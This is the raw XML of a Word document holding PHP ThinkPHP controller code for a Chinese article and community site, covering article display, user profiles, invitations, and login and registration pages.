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FF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7235B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115ED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'app_init'     =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8AD6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'app_begin'    =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4D27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'module_init'  =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE157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'action_begin' =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E3C1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'view_filter'  =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2489AB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'log_write'    =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5084C9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'app_end'      =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113708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'action_log'=&gt;[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073D35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'\app\behavior\ActionLog',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524C0A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40FB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9EE50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6968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app\index\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E63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app\index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1341F5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6462FB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think\Request; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44540F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 extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F06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CD37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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2835E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3821F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E97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5CF3DF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2C4E8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0F06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view(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A1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if(!input('?id')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA9F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$this-&gt;redirect(_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBF5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FBC3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51989E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7171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$this-&gt;redirect(_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAE9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2113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$name=Db::name('article')-&gt;where(['id'=&gt;$id])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EA81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4683E7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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5E98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FA1D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if($name['hide']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5645E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内容不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521CFC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1CCC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if($name['hide']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CBE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文章正在审核，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9E9C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EC0E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if($name['hide']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE303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文章未通过，无法查看</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F018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CD1D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Db::name('article')-&gt;where(['id'=&gt;$id,'hide'=&gt;1])-&gt;setInc('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FB8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if($name['content']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473D2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preg_match_all("/img(.*?)src=\"(.*?)\"/", stripslashes($name['content']),$content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11339F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($content[2] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C5C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if(strstr($v,'http')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1344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if(strpos($v,'/public/uploads/us/') !== false){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A32C3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8813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$name['content']=str_replace($v,_imgUrl().$v,stripslashes($name['content']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F1D1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802AC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A852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6762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if($name['mychannel']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E36A9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p>
    <w:p w14:paraId="320291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if($name['weitoutiao']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2781BA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(json_decode($name['images'],true) as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE1E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$content.='&lt;p class="a-image"&gt;&lt;img src="'._imgUrl().$v['img'].'"&gt;&lt;/p&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02468F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$content.='&lt;p class="a-image"&gt;'.$v['img_text'].'&lt;/p&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F20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3861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00E1A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$name['images']=htmlspecialchars_decode($name['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B46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$name['images']=json_decode($name['images'],true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DA7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($name['images'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F248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if(is_array($v)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C60D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$v=$v['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461030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62874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$content.='&lt;p class="a-image"&gt;&lt;img src="'._imgUrl().$v.'"&gt;&lt;/p&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901A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2F6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C953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$name['content']="&lt;p&gt;".$name['description']."&lt;/p&gt;".$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9D4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if($name['mychannel']==3 || $name['mychannel']==4){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBAAB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if($name['mychannel']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40433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$videoimages=$name['image'] ? $name['image'] : $name['video']."?vframe/jpg/offset/2/w/400/h/400";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB8A2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C3FD7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$videoimages=$name['image'] ? $name['image'] : $name['video']."?vframe/jpg/offset/2/w/400/h/700";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782CEE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D69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$videoimages=_imgUrl().$videoimages;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3960F9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$this-&gt;assign('videoimages',$videoimages);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856F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C69D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$user=Db::name('member')-&gt;where('id',$name['uid'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C9B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$this-&gt;assign('user',$user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D34E2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$ping=Db::name('article_ping')-&gt;where('aid',$id)-&gt;order('time desc')-&gt;limit(20)-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E4D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 as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567F85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$user=_user($v['uid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752347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$ping[$k]['img']=_imgUrl().$user['img']."?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657C38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$ping[$k]['username']=$user['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A27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08F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$this-&gt;assign('ping',$ping);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0937AC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37D24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 = Db::name('ad')-&gt;where(['hide' =&gt; 1,'device'=&gt;0])-&gt;order('rand()')-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A04F0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$this-&gt;assign('ad',$ad);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9DF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9FE6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E28F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user(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B87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if(!input('?id')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA208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$this-&gt;redirect(_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639C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0428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67A581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36D79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$this-&gt;redirect(_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D397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774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if(_session()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1F20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$member=_member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112042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9FDD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$user=_user($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F5FC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if($user['hide']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEFB6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该账户已被禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3D67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if($user['hide']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C0F1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该账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EAB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if($user['hide']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C02E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该账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16710E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482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$user['guanzhu']=Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$user['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D443C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$user['fensi']=Db::name('member_guanzhu')-&gt;where(['gz_uid'=&gt;$user['id']])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC3D0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$this-&gt;assign('user',$user); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1BD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20E27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1D0B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yaoqing(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5953E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$uid=input('uid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02384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$this-&gt;assign('uid',$uid); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438B10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if(cookie('?code')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49015D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$code=cookie('code')-time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54790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$this-&gt;assign('code',$code); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B40D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87EF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A097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2C3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erweima(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268B2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$uid=input('uid/d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BC1D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$url=url('index/m/yaoqing',['uid'=&gt;$uid],'',true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D30F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$url='https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160044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$this-&gt;assign('url',$url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235DA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A556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A05C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hongbaoapp(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFD0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8C449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45B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640B5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B8C5F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app\index\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D86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think\Controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A624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766A42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Common extends Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D27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D5CBE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9F314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D5998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namespace app\index\controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314023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app\index\controller\Common;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8C5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59A17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21918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think\Request; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67904F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26537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Qiniu\Storage\BucketManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C06C4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5AB510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User extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F58E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0176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__construct($tokenaaa=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E049C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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E1A1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EBCB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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF784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51926A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906C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$this-&gt;redirect(_webfig('url'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13245A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A469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if(_session()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6281A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$member=_member();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24079E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52C4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$user=_user($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293FB8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if($user['hide']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8754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该账户已被禁止</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB537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if($user['hide']==3){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491200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该账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AC0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if($user['hide']==2){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9D11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该账户正在审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B67E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2863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if(_session()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8800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$user['guanzhu']=Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$member['id'],'gz_uid'=&gt;$user['id']])-&gt;value('id');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388979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D0D25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$user['guanzhu']=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7123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6294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$user['dongtai']=Db::name('member_guanzhu')-&gt;where(['uid'=&gt;$id])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF0D0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$user['fensi']=Db::name('member_guanzhu')-&gt;where(['gz_uid'=&gt;$id])-&gt;count();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547BC7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$this-&gt;assign('user',$user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D42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$typeid=Db::name('typeid')-&gt;where(['hide'=&gt;1,'tid'=&gt;0])-&gt;order('hide desc,des desc')-&gt;limit(100)-&gt;cache(_cache('db'))-&gt;field('id,title')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFF07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34CB5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77C352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$channel=Db::name('member')-&gt;field('id,img,mobile,nickname')-&gt;where($where)-&gt;limit(6)-&gt;order('rand()')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B46D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($channel as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C3C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if($v['nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24225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$channel[$k]['username']=$v['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C7CA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if($v['mobile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC32F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$channel[$k]['mobile']=$v['mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A5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DC0F4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$channel[$k]['mobile']='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E60A3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$channel[$k]['nickname']='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6644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if(!$v['img']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A628A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$channel[$k]['img']='/public/style/index/member/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415ED6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E5017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$channel[$k]['img']=_imgurl().$v['img'].'?imageView2/1/w/55/h/55';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11900C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4A19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B107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$this-&gt;assign('channel',$channel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316E48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ED300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C4EE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login(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED64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if(Session::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E32A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$this-&gt;redirect("member/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18051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3DA4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$data=Db::name('member_config')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CBD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085276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5E86C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$config[$v['name']]['name']=$v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749E64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$config[$v['name']]['title']=$v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B80D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$config[$v['name']]['content']=$v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C25B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$config[$v['name']]['text']=$v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E4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2AFF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$this-&gt;assign('config',$config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77922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3C7B7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if(!$config['switch']['text'] || $config['switch']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4C2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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F554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BA7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$reguser=$config['reguser']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6156B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$regmobile=$config['regmobile']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57167E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$regemail=$config['regemail']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FCC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$username=$reguser.$regmobile.$regemail;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416FFF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$username=rtrim($username, "/");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B421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$this-&gt;assign('username',$username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197BC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if(Request::instance()-&gt;isPost()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3BB4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$token=input('token') ? input('token') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369937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(!_decrypt($token)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA2A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4E437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登录失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9610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1270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63E3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Session::set('user',$token,'ffxiangUser');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5215AC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['ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>登录成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24958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7FBBA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F1FA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846D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6FE5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reg(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC927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if(Session::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFA8D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$this-&gt;redirect("member/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D231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5B069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$data=Db::name('member_config')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3BB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD2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68197B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$config[$v['name']]['name']=$v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A647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$config[$v['name']]['title']=$v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A000A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$config[$v['name']]['content']=$v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA17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$config[$v['name']]['text']=$v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA66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4313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$this-&gt;assign('config',$config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675BAE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434E27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if(!$config['switch']['text'] || $config['switch']['text']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284A32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未开放会员系统</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184C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6A36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if(!$config['regmobile']['text'] &amp;&amp; !$config['regemail']['text'] &amp;&amp; !$config['reguser']['text']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB89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会员设置操作有问题，请在后台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会员管理</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>配置设置中的用户名、手机、邮箱，至少要开放一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C2C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991C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$reguser=$config['reguser']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD95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$regmobile=$config['regmobile']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698EC6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$regemail=$config['regemail']['text'] ? '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/' : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25518B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$username=$reguser.$regmobile.$regemail;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445A4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$username=rtrim($username, "/");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AFB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$this-&gt;assign('username',$username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB23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EB460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DE8D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password(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CED6E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if(Session::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9C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$this-&gt;redirect("member/index");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724951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CC9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$data=Db::name('member_config')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21717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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860A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4EFF99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$config[$v['name']]['name']=$v['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA544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$config[$v['name']]['title']=$v['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653CBA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$config[$v['name']]['content']=$v['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C1A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$config[$v['name']]['text']=$v['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F6F1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8A23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$this-&gt;assign('config',$config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138AD7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508731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if(!$config['switch']['text'] || $config['switch']['text']==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8089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未开放会员系统</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773452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46F8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if(!$config['regmobile']['text'] &amp;&amp; !$config['regemail']['text']){</w:t>
      </w:r>
    </w:p>
